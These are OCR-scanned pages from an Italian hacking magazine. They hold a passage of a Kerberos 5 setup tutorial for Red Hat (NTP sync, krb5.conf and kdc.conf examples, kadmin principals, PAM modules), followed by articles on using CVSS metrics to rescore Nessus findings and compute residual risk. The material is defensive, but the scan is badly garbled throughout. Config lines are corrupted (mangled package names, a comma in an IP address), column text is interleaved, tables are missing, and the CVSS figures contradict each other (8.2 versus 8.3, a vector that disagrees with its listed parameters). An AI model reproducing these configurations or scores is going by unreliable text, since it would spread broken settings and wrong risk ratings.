e si trovano sulla stessa macchina 
fisica, per risparmiare sui costi di 
gestione. Abbiamo accennato al fatto 
che i Ticket Granting Ticket hanno una 
vi durata, entro la quale l'utente non deve 
reinserire nuovamente la password. 


Questa caratteristica introduce 

un problema di sicurezza non 

banale: se il computer client ed il 
server Kdc non sono sincronizzati, 

un utente malizioso potrebbe 

usare ticket scaduti per accedere 

a servizi a lui negati. Per questo 
motivo, quando si configura una 

rete basata su Kerberos, dobbiamo 
preoccuparci di avere tutte le 
macchine sincronizzate, con uno 
scarto massimo standard di cinque 
minuti, che eventualmente si può 
rimodellare secondo le nostre 
esigenze. Per farlo, possiamo utilizzare 
il Network Time Protocol, che fornisce 
una sincronizzazione automatica 
grazie ad un demone chiamato ntpd. 


Esso è contenuto nel pacchetto 

ntp, ed è disponibile sia sui cd delle 
maggiori distribuzioni che su internet 
in vari indirizzi, tra i quali romfind.net. 
Per installarlo su una Debian si usa il 
comando: 


# apt-get install ntp 

Mentre per le distribuzioni basate 

su rpm bisogna prima scaricare il 
pacchetto e poi installarlo con il solito: 


# rpm -ivh ntp-versione. rpm 


Possiamo configurarlo sia agendo sul 
file /etc/ntp.conf che con il programma 
disponibile in Red Hat chiamato 


# redhat-config-date 


7In entrambi i casi dovremo 
specificare un server di riferimento con 
il quale sincronizzare il nostro pc, ed 
una lista di quelli pubblici può essere 
trovata all'indirizzo: 
www.eecis.udel.edu/-mills/ntp/ 
servers.html. 

Il file di configurazione /etc/ntp.conf è 
mostrato nella Tabella 1, e l'unica cosa 
che dovremo fare è accertarci che 

tutti i file di configurazione dei pc, che 
costituiscono la nostra rete Kerberos, 
utilizzino gli stessi campi nella voce 
server, per averli tutti sincronizzati sulla 
stessa ora. 


TABELLA 1: 
Il file /etc/ntp.conf 


# /etc/ntp.conf, configuration 
for ntpd 

# ntpd will use syslog() if 
logfile is not defined 

# logfile /var/log/ntpd 
driftfile /var/lib/ntp/ntp. 
drift 

statsdir /var/log/ntpstats/ 
statistics loopstats 
peerstats clockstats 
filegen loopstats file 
loopstats type day enable 
filegen peerstats file 
peerstats type day enable 
filegen clockstats file 
clockstats type day enable 


# sezione dedicata ai server 
per la sincronizzazione, è 
importante che 

# tutti i pc delle stessa LAN 
usino gli stessi indirizzi 
ip. 

server 193.204.114.231 


server 131.188.44.45 
server 134,214.100.6 


Ora che siamo sicuri che tutti i 
pc della rete Kerberos sono stati 
sincronizzati, dobbiamo accertarci 
che sia ben configurato il Dns nella 
macchina che farà da server Kde. 
Procediamo quindi con l'installazione 
dei pacchetti necessari nel server, 
utilizzando la distribuzione Red Hat 
come piattaforma di base. Sarà 
facile trasportare le stesse nozioni 
anche su macchine con installate 
altre distribuzioni, perciò lasciamo 
al lettore il compito di adattare le 
soluzioni di questo articolo alle 
esigenze personali. 


Per prima cosa installiamo i pacchetti 
krbS-libs, krbS-server, krb5- 
workstation. Dopo aver installato 
il software necessario dobbiamo 
decidere come chiamare il nostro 
Realm. Una convenzione molto usata 
è quella di utilizzare lo stesso nome 
del dominio, utilizzando però solo 
lettere maiuscole, come ad esempio 
HACKERJOURNAL.IT per il dominio 
hackerjournal.it. 
| due file di configurazione da 
modificare sono /etc/krb5.conf e /var/ 
kerberos/krbSkdc/kdc.conf 
Potete vedere un esempio di come 
vanno configurati questi due file nelle 
Tabelle 2 e 3. Ovviamente dovete 
sostituire ad “esempio.com” il vostro 
dominio, e ad “ESEMPIO.COM" il 
vostro Realm. Dovete fare attenzione a 
non scambiare per errore maiuscole e 
minuscole, perché in questa situazione 
hanno diversi significati. 


TABELLA 2: 
Esempio di file /etc/krb5.conf 


[logging] 


SICURE 


w A 


default = FILE:/var/log/ 
krb5libs.log 

kdc = FILE:/var/log/ 
krb5kdc. log 

admin server = FILE:/var/ 
log/kadmind, log 


[libdefaults] 
ticket_lifetime = 24000 
default_realm = ESEMPIO.COM 
dns_lookup_realm = false 
dns_lookup_kdc = false 


[realms] 

ESEMPIO.COM = { 

kdc = kerberos.esempio. 
com:88 

admin server = 
esempio. com:749 
default domain = esempio. 
com 


} 


kerberos. 


[domain_realm] 
.esempio.com = ESEMPIO.COM 
esempio.com = ESEMPIO.COM 


[kdc] 
profile = /var/kerberos/ 
krb5kdc/kdc. conf 
è 


[appdefaults] 

pam = { 
debug = false 
ticket_lifetime = 36000 
renew lifetime = 36000 
forwardable = true 
krb4_ convert = false 


TABELLA 3: 

Esempio del file di 
configurazione /var/kerberos/ 
krb5kdc/kdc.conf 


kdcdefaults] 

acl file = /var/kerberos/ 
krb5kdc/kadm5 .acl 

dict_file = /usr/share/dict/ 
words 


admin _keytab = /var/ 


kerberos/krb5kdc/kadm5.keytab 


v4_mode = nopreauth 


[realms] 
ESEMPIO.COM = { 


master key type = des-cbc- 
cre 

supported enctypes = 
des3-cbc-shal:normal 
des3-cbc-shal:norealm 
des3-cbc-shal:onlyrealm 
des-cbc-crce:v4 des-chc- 
erc:afs3 des-cbc-crc:normal 
des-cbc-crc:norealm 
des-cbc-crc:onlyrealm 
des-cbc-md4:v4 des-cbc- 
md4:afs3 des-chc-md4:normal 
des-cbc-md4:norealm 
des-cbc-md4:onlyrealm 
des-cbc-md5:v4 des-cbc- 
md5:afs3 des-cbc-md5:;normal 
des-cbc-md5:norealm 
des-cbc-md5:onlyrealm 
des-cbc-shal:v4 des-cbc- 
shal:afs3 des-cbc-shal:normal 
des-cbc-shal:norealm des-chc- 
shal:onlyrealm 
} 


Dopo aver inserito i nostri dati nei 
due file di configurazione principali 
del server KDC, dobbiamo creare 
il database che conterrà le chiavi, 
tramite il comando: 


# /usr/kerberos/sbin/kdb5_ 
util create -s 


L'opzione -s serve per immagazzinare 
la chiave del server in un file e se 
non specificata occorrerà reinserirla 
ad ogni reboot del server. Una 

volta creato il database delle chiavi, 
dobbiamo stabilire quali principal 
avranno permesso di modificare il 
database delle chiavi di kerberos, 
agendo sul file di configurazione / 
var/kerberos/krbSkdc/kadmS.acl. 
Solitamente in questo file basterà 
inserire questa unica linea: 


*/admin@ESEMPIO.COM * 


la quale indica al server Kerberos che 
qualsiasi utente che abbia un’istanza 
di admin nel realm ESEMPIO.COM, 
possiede anche pieni poteri sul 
database. Le istanze, come al solito, 
vengono indicate nel principal in un 
modo simile a questo: 


max/admin@ESEMPIO.COM 


dove la voce prima dello “/” indica 
l'utente, la stringa compresa tra lo 
slash e la chiocciola indica l'istanza, ell 
la parte finale indica il Realm. 


KADMIN 


Per amministrare i principal si 
utilizzerà il programma kadmin, che 
si connette al demone kadmind 
utilizzando un'autenticazione 
Kerberos. Ovviamente per poterlo 
utilizzare amministratore dovrà 
creare almeno un Principal di 
partenza, con il quale potrà 
successivamente eseguire kadmin. 
Per creare il primo principal, basterà 
eseguire il comando: 


# /usr/kerberos/sbin/kadmin. 
local -q “addprinc max/admin” 


Il comando kadmin.local si usa 
‘solamente nello stesso host del 

Kde e non utilizza l'autenticazione 
‘su Kerberos, che, d'altra parte, 

non sarebbe ancora disponibile a 
causa dell'assenza di principal nel 
database. Lo stesso comando si può 
utilizzare per aggiungere altri utenti, 
come ad esempio: 


# /usr/kerberos/sbin/kadmin. 
local -q “addprinc max” 


L'utente appena creato non possiede 
un'istanza di admin ed è considerato 
quindi un utente standard. Dopo 
aver aggiunto gli utenti, dovremo far 
partire i demoni per Kerberos: 


# /etc/init.d/krb5kdc start 
# /etc/init.d/kadmin start 
# /etc/init.d/krb524 start 


Per farli partire automaticamente 
‘ad ogni avvio possiamo utilizzare il 
programma chkconfig: 


# chkconfig --level 345 


krb5kdc on 
# chkconfig --level 345 
kadmin on 
# chkconfig --level 345 
krb524 on 


Abbiamo quindi terminato la 
configurazione del server. Prima di 
passare ai client è necessario porre 
attenzione ancora su qualche aspetto 
di sicurezza. Data la centralità del 
Pay. Sistema di autenticazione Kerberos, è 
“indispensabile per un amministratore 
IE avere la certezza che la macchina 
che funge da Kde sia protetta contro 
‘accessi non autorizzati. 


»l comandi che abbiamo appena 
ig visto possono permettere ad un 
“intruso di creare un personal e 
È: — conseguentemente di avere accesso 
a tutti i computer che fanno uso 
# * dell’autenticazione Kerberos. 
Inoltre, la sicurezza di questo 
‘* sistema si estende solo ai programmi 
che fanno uso dell’autenticazione 
*._ Kerberos, quindi dovremo sostituire 


4a %® i programmi insicuri con applicativi 


che offrono già il supporto a questo 
7 RR ‘sistema. Inutile dire che se un utente 
de Utilizza il classico telnet, lascia che 
£. la sua password venga trasmessa in 
. Chiaro. Se questa disgraziatamente 
è la stessa utilizzata per Kerberos, 
% allora il suo account è compromesso 


indipendentemente dalla sicurezza del 
| sistema del MIT. 


IL CLIENT 


Per proseguire con il nostro esempio 
di campo applicativo di Kerberos, 
> configureremo una macchina client 
es per supportare l'autenticazione. Se 
4 Stiamo installando da zero il client, 
#: possiamo utilizzare l'apposito pannello 
# di configurazione che viene fornito 


«ef con il setup della Red Hat : alla voce 
nali dell’autenticazione 


PA 
a 
” 


‘ci viene permesso di utilizzare 
Kerberos, scegliendo tra le tre opzioni 
disponibili (Accesso ad una rete che 
usa Kerberos, accesso ad un Kdc o 
accesso ad una macchina che utilizza 
kdamind). 


Se invece dovete effettuare questo 
procedimento dopo la prima 
installazione, allora dovete assicurarvi 
di aggiungere i pacchetti krbS-libs 

e krb5-workstation, ed eseguire il 


programma authconfig. 


In generale le operazioni da fare sono 
copiare il file /etc/krbS.conf in tutti i 
client e cambiare il file /var/kerberos/ 
krb5kdc/kdc.conf in modo coerente. 
Dopo aver creato correttamente questi 
due file, dobbiamo creare un principal 
corrispondente all'host da aggiungere 
alla rete. Per fare quest'ultimo 
passaggio dovremo eseguire nel Kdc: 


# kadmin 


Che ci fornirà una console con la quale 
andiamo ad aggiungere l'host: 


# addprinc -randkey host/ 
clientl.esempio.com 


Dove la parte successiva al ‘“/" 
corrisponde al nome dell’host da 
‘aggiungere. L'opzione randkey serve 
a creare una chiave casuale. Dopo 
aver creato il principal per il client, ne 
estrapoliamo le chiavi: 


# ktadd -k /etc/krb5.keytab 
host/clientl.esempio.com 


Ora abbiamo a disposizione un 
sistema Kerberos 5 funzionante, ma 
dobbiamo assicurarci che i programmi 
utilizzino questo sistema per 
autenticare i loro utenti. 


In generale, un'applicazione deve 

già essere stata pensata per un 
determinato sistema di autenticazione, 
quindi è necessario cercare la versione 
che utilizza kerberos o ricompilare i 
sorgenti dopo averli modificati allo 
scopo. 


MODULI DI 
AUTENTICAZIONE 


I moduli di autenticazione Pam 
ci vengono in aiuto, fornendo un 
livello di astrazione sufficiente 
ad evitare la ricompilazione 

e l'adattamento di tutte le 
applicazioni che li utilizzano. 
Per esempio, per l’accesso al 
sistema il file di configurazione per 


l'autenticazione è /etc/pam.d/login, 

e modificando questo file in tutti i 
client potremo utilizzare Kerberos per 
il login di sistema. Un esempio della 
configurazione per il login e per il 
servizio Ftp è mostrato nella Tabella 4. 


Ovviamente dovremo configurare 
ogni file di configurazione della 
directory /etc/pam.d relativo ai servizi 
che vorremo autenticare attraverso 
Kerberos. 


TABELLA 4: 
Utilizzo di kerberos in /etc/pam.d/ 
login 


#/etc/pam.d/login 


auth required /lib/security/ 
pam_securetty.so 

auth required /lib/security/ 
pam_nologin.so 

auth sufficient /lib/security/ 
pam_krb5.so 

auth required /lib/security/ 
pam_pwdb.so shadow nullok 
use_first_pass 


#/etc/pam.d/ftp 
auth required /lib/security/ 
pam_listfile.so item=user 
sense=deny file=/etc/ftpusers 
onerr=succeed 

auth suficient /lib/security/ 
pam_krb5.so 

auth required /lib/security/ 
pam_pwdb.so shadow nullok 
use_first_pass 

auth required /lib/security/ 
pam_shells.so 


CONCLUSIONI 


Ora che abbiamo imparato come 
utilizzare un sistema di difesa 
abbastanza potente, dobbiamo 
essere sicuri che ogni componente 
utilizzato lo sfrutti, eventualmente 
eliminando gli altri sistemi di 
autenticazione, togliendo gli utenti dai 
sistemi non Kerberos ed obbligandoli 
quindi al suo utilizzo, magari dopo un 
periodo di test. 


di Lead Auditor - [SO 27001Membro esterno del comitato sicurezza ISPESL, 
Salvatore D'Emilio - Lead Auditor ISO 27001CSO ISPESL, 


Francesco Gaudieri - [Lead Auditor ISO 27001 


UNA GUIDA AL CORRETTO UTILIZZO DEL RISK 


FACTOR CVSS EVIDENZIATO DAI REPORT DI NESSUS. 


essus è un software 
proprietario di tipo 
client-server che 
tramite lo scan e 
l'abilitazione di plugin 
‘appositamente 
configurabili a seconda della 
tipologia di host e vulnerabilità che 
si andrà ad analizzare, rileva le 
vulnerabilità presenti suggerendo le 
possibili soluzioni creando report di 
facile analisi in vari formati (HTML, 
pdf, etc.etc). 
Questo è un analizzatore di rete è 
stato creato da Renaud Deraison ed 


è ormai portato avanti da migliaia di 
volontari sparsi in tutto il mondo. 


PREMESSA 


Nessus utilizza come indicatore del 
livello di rischio per le vulnerabilità 
individuate il Risk Factor base del 
Common Vulnerability Scoring 
System (CVSS). 

Se andiamo ad analizzare la 
metodologia descritta dal FIRST 
(Complete Guide to the Common 


Vulnerability Scoring System Version 
2.0 cfr.[1]) notiamo che essa può 
essere considerata, a tutti gli effetti, 
una analisi dei rischi minimale per il 
trattamento delle vulnerabilità relative 
al mondo internet: in effetti il CVSS 
opera con tre gruppi di metriche: 


1. Base; 
2. Temporal; 
3. Environmental. 


Ogni gruppo genera un valore 
numerico (da 1 a 10) ed un vettore 
che riflette i valori utilizzati per il 


calcolo. La metrica Base indica 

il rischio assoluto legato alla 
vulnerabilità, senza considerare 
l'esistenza ed il livello delle 
contromisure (patch) e l’ambiente 
nel quale opera il sistema. 

La metrica Temporal rappresenta 
l'evoluzione della vulnerabilità 

nel tempo (esistenza e livello 
delle patch, ecc.). La metrica 
Environmental personalizza il rischio 
legandolo alla realtà operativa del 
sistema esaminato. In generale, le 
metriche di base e temporali sono 
calcolate: dai produttori e riportate 
nei bollettini sulle vulnerabilità, 
mentre quelle di ambiente sono 
valorizzate dagli utenti finali, gli 
unici a fondo conoscere la realtà 
sotto esame. 

Per la metodologia le uniche 
metriche obbligatorie sono 

quelle base. Il corretto utilizzo 
delle metriche Temporal ed 
Environmental, tuttavia, consente 


di legare il valore di rischio della 
metrica base alla realtà sotto esame 
(Environmental) e di ottenere il 
rischio residuo. 


L'utilizzo delle metriche temporali 

e di ambiente è opzionale, questo 
processo deve essere utilizzato 
quando si richiede di riportare il 
rischio nell'ambiente dell'utente 
finale. La valutazione delle metriche 
temporali, così come quella delle 
metriche di ambiente, è calcolata su 
una scala da 1 a 10. 


IL CALCOLO CVSs 


Per comprendere ed utilizzare in 
maniera corretta la metodologia, 
‘occorre analizzare quali sono i 
parametri considerati in ogni gruppo 
di metriche e come essi vengano 
utilizzati per | calcolare i valori in 
gioco. Nel documento indicheremo 
solo le linee fondamentali della 
metodologia, rimandando per 
‘approfondimenti ed analisi delle 
formule per il calcolo del rischio 

e della sua mitigazione al sito 
ufficiale [1]. Non entreremo neanche 
in merito ai criteri adottati dagli 
ideatori della metodologia, sulla 
quale si potrebbero sollevare alcune 
obiezioni, tuttavia il CVSS può essere 
considerato come uno standard nella 
valutazione del rischio relativo alle 


vulnerabilità, e come tale va adottato. 


METRICHE DI BASE 


| parametri considerati nel gruppo di 
base sono riportati nella fig.2 


Base 
Metric Group 


L'Access Vector, l’Access Complexity 
e le metriche di Authentication 
indicano:come la vulnerabilità si attiva 


e se esistano o no requisiti aggiuntivi 
perché ciò accada. Le tre metriche 
misurano come la vulnerabilità impatti 
sulla confidenzialità, l'integrità e la 
riservatezza degli asset coinvolti. 


YAccessWector(AV)] 

Rappresenta come la vulnerabilità può 
attivarsi: più l'attaccante può operare 
da remoto, maggiore è il livello di 
rischio. 

LOCALIL): L'attacco è possibile solo 
in locale. 

ADJACENT NETWORK(A): L'attacco 
è possibile solo su reti locali. 
NETWORK(N): L'attacco è possibile 
da remoto. 


\ccess] 

Misura la complessità incontrata per 
portare a termine l'attacco. 

Minore è la complessità, più alto è il 
valore di rischio. 

HIGH(H): L'attacco richiede condizioni 
speciali per essere eseguito. 
MEDIUM(M): L'attacco richiede 
condizioni particolari per essere 
eseguito. 

LOWIL): L'attacco non richiede 
condizioni specifiche per essere 
eseguito. 


Fa utrenticationt(AU) 
Misura quante credenziali servono 
per portare a termine l'attacco. Meno 
credenziali servono, maggiore è il 
rischio. 

MULTIPLE(M): L'attacco richiede più 
credenziali. 

SINGLE (S): L'attacco richiede un 
“single signon” 

NONE (N): L'attacco non richiede 
credenziali. 


[Mpattosulla(Confidentiality/(C) 
Misura l’impatto sulla riservatezza. 
Più alto è l'impatto, maggiore è il 
rischio. 
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NONE(N): Nessun impatto. 
PARTIAL(P): Impatto parziale: 
l'attaccante può accedere ad 

alcune informazioni, ma senza poter 
scegliere quali. 

COMPLETE(C): Impatto totale: tutte 
le informazioni sono compromesse. 


Misura l'impatto sull’integrità delle 
informazioni. Maggiore è l'impatto, 
più alto è il rischio. 

NONE(N): Nessun impatto. 
PARTIALI(P): Impatto parziale: 
l'attaccante può modificare alcune 
informazioni, ma senza poter 
scegliere quali. 

COMPLETE(C): Impatto totale: 
tutte le informazioni possono essere 
modificate. 


Misura l'impatto sulla disponibilità 
del sistema. Più alto è l'impatto, 
maggiore è il rischio. 

NONEI(N): Nessun impatto. 
PARTIAL(P): Impatto parziale: 
l'attaccante può rallentare o impedire 
parzialmente l'utilizzo del sistema. 
COMPLETE(C): Impatto totale: tutte 
le attività del sistema possono essere 
rallentate o impedite. 


[EsempioXdiwettore] 
penlie]metriche]di]baso) 

Come esempio di calcolo delle 
metriche di base prendiamo la Cisco 
Security Advisory: SNMP Version 3 
Authentication Vulnerabilities , per 
maggiori dettagli vedi [2] 

Il produttore ha calcolato il CVSS 
Base Score applicando le seguenti 
valorizzazioni: 


Da questi dati risulta un CVSS Base 
Score 10. Il vettore è il seguente: 


AV:N/AC:L/AU:N/C:C/I:C/A:C 


La vulnerabilità è stata classificata 
dal sistema come CVE-2008-0960 ed 
è reperibile sull’archivio del National 
Vulnerability Database (NVD) gestito 
dal NIST [3]. 


METRICHE 
TEMPORALI 


| rischi legati alle vulnerabilità 
cambiano con il passare del tempo, 
in base allo sviluppo di tecniche per 
sfruttare le vulnerabilità stesse ed alla 
individuazione delle contromisure. 


Indica lo stato dell'arte delle tecniche 
per sfruttare la vulnerabilità. 

Più è facile l'attuazione dell'attacco, 
maggiore è il i rischio. 

UNPROVEN (U): Non ci sono 
tecniche disponibili o la tecnica 
stessa è solamente teorica. 
PROOF-OF-CONCEPT (POC): 

La tecnica è stata testata ma non 

è attuabile per la maggior parte dei 
sistemi senza personalizzazioni da 
parte di un attaccante esperto. 
FUNCTIONAL (F): La tecnica esiste 
ed è efficace sulla maggior parte dei 
sistemi affetti dalla vulnerabilità 
HIGH (H): La tecnica esiste, o non 

è richiesta, e si attiva in maniera 
autonoma (es. worm o virus). 

NOT DEFINED (ND): La metrica non 
viene considerata nel calcolo della 
valorizzazione. 


Indica il livello di maturità delle 
contromisure. Minore è il livello più 
alto è il rischio. 

OFFICIAL FIXM(OF): Esiste una 
contromisura completa ed ufficiale 
messa a disposizione dal produttore. 
TEMPORARY FIX (TF): Esiste una 
contromisura ufficiale ma provvisoria. 
WORKAROUND (W): Esiste una 


contromisura non ufficiale. 
UNAVAILABLE (U): Non esistono 
contromisure o le stesse non sono 
applicabili. 

NOT DEFINED (ND): La metrica non 
viene considerata nel calcolo della 
valorizzazione. 


Indica il livello veridicità sull'esistenza 


della vulnerabilità e sull’affidabilità 
dei dettagli tecnici diffusi. Più alto è 
tale livello, maggiore è il rischio. 
UNCONFIRMED (UC): Esistono 
‘solo voci non confermate sulla 
vulnerabilità. 

UNCORROBORATED (UR): Vi sono 
più fonti non ufficiali, tra le quali 
aziende indipendenti che operano 
sulla sicurezza o ricercatori, che 
descrivono la vulnerabilità. 
CONFIRMED (C): La vulnerabilità 

è confermata ufficialmente dal pro- 
duttore o dalla pubblicazione delle 
sue caratteristiche tecniche o dei 
metodi di attacco. 

NOT DEFINED (ND): La metrica non 
viene considerata nel calcolo della 
valorizzazione. 


[ESempioJdivettore] 
[penleJmetrichextemporali] 

(Come esempio di calcolo delle 
metriche temporali prendiamo 

la Cisco Security Advisory: 

SNMP Version 3 Authentication 
Vulnerabilities , già utilizzata per le 
metriche di base. 


Da questi dati risulta un CVSS Score 
- 8.2. Il vettore è il seguente: ti 


E:F/RL:0F/RC:C 
L'utilizzo delle metriche temporali 


fa sì che il livello di rischio venga 
mitigato da 10 a 8.3. 


METRICHE 
DI AMBIENTE 


Le metriche d'ambiente collegano il 
rischio precedentemente calcolato (si 
usi o meno il vettore temporale) alle 
differenti realtà aziendali. 


Environmental 
Metric Group 


Misura il danno potenziale che l'azienda 
può subire a causa della vulnerabilità. 
NONE (N): Danno inesistente 

LOW (L): Danno minimo. 
LOW-MEDIUM (LM): Danno moderato. 
MEDIUM-HIGH (MH): Danno grave. 
HIGH (H): Danno catastrofico. 

NOT DEFINED (ND): La metrica non 
viene considerata nel calcolo della 
valorizzazione. È compito di ogni 
‘azienda definire, nella sua realtà, il 
significato dei livelli di danno atteso. 


ilargetDistrbution{MD) 
Indica la percentuale di danno atteso 
‘sul sistema in rapporto al numero degli 
‘asset che possono essere danneggiati. 
INONE (N): Nessun asset coinvolto. 
LOW (L): Tra l'1% ed il 25% di aset 
coinvolti. 

MEDIUM (M): Tra l'26% ed il 75% di 
aset coinvolti, 

HIGH (H): Tra l'76% ed il 100% di aset 
coinvolti. 

NOT DEFINED (ND): La metrica non 


‘| viene considerata nel calcolo della 


‘ valorizzazione. 


SccuryRcaui ment CRIIRWAR) 
Valorizza le necessità aziendali in termini 
di riservatezza, integrità e disponibilità. 
Anche se la tabella accorpa i tre requisiti, 
vanno valorizzati separatamente. 

LOW (L): Impatto limitato. 

Medium (M): Impatto grave. 

HIGH (H): Impatto catastrofico 

NOT DEFINED (ND): La metrica non 
viene considerata nel calcolo della 
valorizzazione. 


[Esempiojdi vettore] 
[periejmetriche]d;ambiente] 
Corne esempio di calcolo delle 
metriche d'ambiente prendiamo 

la Cisco Security Advisory: 

SNMP Version 3 Authentication 
Vulnerabilities, già utilizzata per le 
metriche di base. La valorizzazione 
dei parametri, in questo caso, è di 
stretta competenza dell’azienda. 
Ipotizziamo un’azienda che abbia i 
requisiti seguenti: 


Da questi dati risulta un CVSS Score 
— 6.6. Il vettore è il seguente: 


L'utilizzo delle metriche temporali e 
di quelle d'ambiente fa sì che il livello 
di rischio venga mitigato da 10 a 

6.6. Se vogliamo considerare solo le 
metriche di base e quelle d'ambiente, 
lo score passa da 10 a 7.5. Uno 

di questi è il valore reale legato al 
rischio della vulnerabilità in esame 


CALCOLO DEL 
CORRETTO FATTORE 
DI RISCHIO 


Dell’uso dei report di Nessus 
nell'analisi dei rischi abbiamo parlato 
in un precedente lavoro [4], vediamo 
ora come utilizzare in maniera più 
consona alla realtà sotto esame 

tale prodotto. Supponiamo di aver 
fatto girare Nessus sulla nostra rete 
interna e di trovarci di fronte, tra 
l’altro, alla seguente segnalazione: 


rr Rari Ovest 


Come si può notare il livello 

base di rischio del VSS è alto 

e richiederebbe un intervento 
immediato. E' chiaro che le metriche 


Target 
Distribution | 


Gollateral — | 


Damage 
Potential 


Visor | Integrità (IR) 


Disponibilità | 
(AR) 


temporali, in questo caso, non ci 
servono, perché il report ci dice che 
‘anche se la soluzione al problema 
esiste, non è stata applicata. 

Ma l'importante, per dirigere gli 
sforzi verso i reali obiettivi primari 

è valutare il rischio legato al mio 
‘ambiente. Raccogliamo dal National 
Vulnerability Database (NVD) [5] i 
dettagli per l’analisi. La parte che ci 
interessa dice: 


Analizziamo, ora, dove è allocato 
il server, quale danno può subire 
e cosa tratta: Il server è sulla rete 
locale, tratta dati che possono 
procurare all'azienda un danno 
limitato, tratta dati pubblici non 
essenziali, quindi non richiede 
riservatezza e le esigenze di 
disponibilità sono limitate, mentre 
è importante l'integrità delle 
informazioni. In caso di problemi 


LE METRICHE 
D'AMBIENTE 
COLLEGANO IL 
RISCHIO ALLE 
DIFFERENTI 
REALTA | 
AZIENDALI "| 


RETI/DIFFICILE 


gli asset coinvolti riguardano un NVD provides severity rankings of classificabile come “HIGH” , mentre 
percentuale, sul totale esaminato, “Low,” “Medium,” and “High” in quello reale, riscontrato sul campo, 
minore del 10%. addition to the numeric CVSS scores ci riporta ad uno score “LOW”: 
Compiliamo la tabella delle metriche but these qualitative rankings are questo ci consente di classificare 
d'ambiente: Utilizzando il tool gratis simply mapped from the numeric correttamente la priorità degli inter- 

cai + ana | venticorrettivi da eseguire. 

Collateral Target 5 a 

lie Distribution Riservatezza Integrità Disponibilità 

Low Low (0-25%) Low Medium Low 
reperibile su internet per calcolare CVSS scores: 
il CVSS [6] verifichiamo il rischio [1] http:/www.first.org/cvss/ 
effettivo per noi, tralasciando le [2] http://www. cisco.com/warp/public/707/ 
metriche temporali, perché, come cisco-sa-20080610-snmpv3.shtml 
Visto, non entrano in gioco. Da questi [3] http://web.nvd.nist.gov/view/vuln/ 
dati risulta un CVSS Score - 1.7 detail?vulnid=CVE-2008-0960 
Il vettore è il seguente: [4] Francesco Merlo, Fabio Guasconi - 
Dispensa analisi dei rischi 
[5] http:/web.nvd.nist.gov/view/vuln/ 
fi detail?execution=e1s1 

Controllando la metodologia NVD [6] http://jwnrss.ise.chuo-u.ac.jp/jtg/index 
di suddivisione del CVSS Score Possiamo Quindi notare come, en.html 
notiamo i seguenti accorpamenti: lo score riportato da Nessus, [7] http://Awww.securityfocus.com/ 


INVD]Vulnerability{SeverityyRatings] senza verifica dell'ambiente, sia 


NESSUS UTILIZZA COME INDICATORE DEL 
LIVELLO DI RISCHIO PER LE VULNERABILITÀ 
INDIVIDUATE IL RISK FACTOR BASE DEL 
COMMON VULNERABILITY SCORING SYSTEM 
(CVSS) 


CELLULAR )_n_( cLouD 
COMPUTING 


Mt, 


48 HACKER JOURNAL 


RETI/DIFFICILE 
di Francesco Merlo Lead Auditor ISO 27001. Membro estemo del comitato sicurezza ISPESL, 
Salvatore D'Emilio - lLead Auditor ISO 27001CSO ISPESL, ill 
Francesco Gaudiieri - Lead Auditor ISO 27001 3 


RICUOS: 


il CALCOLO nEL RISCHIO RESIGUO 


REPORT 
DOPO AVERE 
CAPITO, NEL 
PRECEDENTE 
NUMERO DI 
HACKER JDURNAL 
COME UTILIZZARE 
iL COMMON 
VULNERABILITY 
SCORING_ SYSTEM 
PER.IL CALCOLO 
DEL'RISCHIO 
EFFETTIVO DI UNA 
VULNERABILITÀ, 
PASSIAMO ORA 
AD UN ALTRO 
TEMA MOLTO 
INTERESSANTE, 

IN QUALCHE MODO 
CRUCIALE, 
OVVERO 

COME CALCOLARE 
IL RISCHIO 
RESIDUO... 


el precedente articolo calcolare anche il rischio | rischi legati alle 


(Il fattore di rischio residuo, il rischio, Temporal vulnerabilità cambiano 
Hacker Journal 209) cioè, che permane i Metric Group con il passare del tempo, 
abbiamo illustrato dopo l’adozione i preme in base allo sviluppo di 
come utilizzare delle opportune polclalta if tecniche per sfruttare 
correttamente il CVSS —contromistire: a tal fine le vulnerabilità stesse 
per calcolare il rischio effettivo di utilizzeremo le metriche pro esa) ed alla individuazione 
una vulnerabilità nella realtà sotto temporali. Riteniamo rivi ‘e realizzazione delle 
esame con l'utilizzo delle metriche utile riproporre; per relative contromisure. 
d’ambiente. semplificare la Jettura, Le metriche adottate 
Con questo scritto completiamo quanto scritto riguardo le per la valutazione sono 
l'argomento vedendo come stesse. riportate nella fig.1 
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EXPLOITABILITY (E) CVSS:RIEPILOGO 


Indica lo stato dell’arte delle tecniche Torniamo brevemente, prima dî 


per sfruttare la vulnerabilità. proseguire, sul concetto di CVSS per 
Più è facile l'attuazione dell'attacco, coloro che avessero perso il numero 
maggiore è il i rischio. precedente di HJ. 


Non cì sono tecniche disponibili 0 la tecnica 
ii stessa è solamente teorico. 
La tecnica è stata testata ma non è attuabile per la 
Proof-of-Concept (POC) ada, dei sistemi senza personalizzazioni 
i parte di un attaccante esperto. 
N : La tecnica esiste ed è efficace sulla maggior 
DICI parte ce sistemi feti dll vinerablà. __ 
High (4) La tecnica esiste. 0 non è richiesta, esi attiva in | 
maniera autonoma (es. worm 0 virus). 
Not Defined (ND) Li eri 
{MR it icrritomatione n Il Common Vulnerability Scoring 
REMEDIATION System Version 2.0 può essere 
LEVEL\CRL) considerato, a tutti gli effetti, una 
I analisi dei rischi minimali per il 
trattamento delle vulnerabilità 
Indica il livello di maturità delle relative al mondo internet. Opera 
contromisure, Minore è il livello più con tre gruppi di metriche: Base, 
alto è il rischio. Temporal, Environmental. 


Official Fixm(0F) Si e dipana 
Temporary Fix (TA) Esiste una contromisura ufficiale ma provvisaria. 
Workaround (W) Esiste una contromisura non ufficiale: ' 

Unavailable Lu) Non o fidi stesse 
Not Defined (ND) -| ta metrica pon viene considerata ne acoo 


IL CALCOLO DEL 
RISCHIO RESIDUO. 


Riprendiamo in esame l'esempio 
dell'articolo precedente: 


| parametri base risultano i seguenti: 


Access: Network 

Vector: Network 

Access: Complexity: 
LowAuthentication: None 
Confidentiality Impact: Partial 
Integrity Impact: Partial 
Availability Impact: Partial 


Il vettore di rischio, ed il suo livello, sono: 


AV:NZAC:L/Au:N/C:P/I:P/A:C CVSS 
Score — 7.5 


Abbiamo impostato i parametri del 
rischio legato all'ambiente sotto | 
esame come segue: 


REDDEI 5 Esistono solo Vacinon ‘confermate sulla 
CONFIDENGCE (RO) Uncanfirmed (UC) neri 
Uncorroborated (UR) doro che a 
Indica il livello veridicità : ( OL cio 
sull'esistenza della vulnerabilità e Law e can almant 
sani > ate 5 vulnerabilità è conferm: icialmente 
SUI AMICA dotdetaa. Pongo: Confirmed (C) dal produttore o dalla pubblicazione delle sue 


diffusi. Più alto è tale livello, 


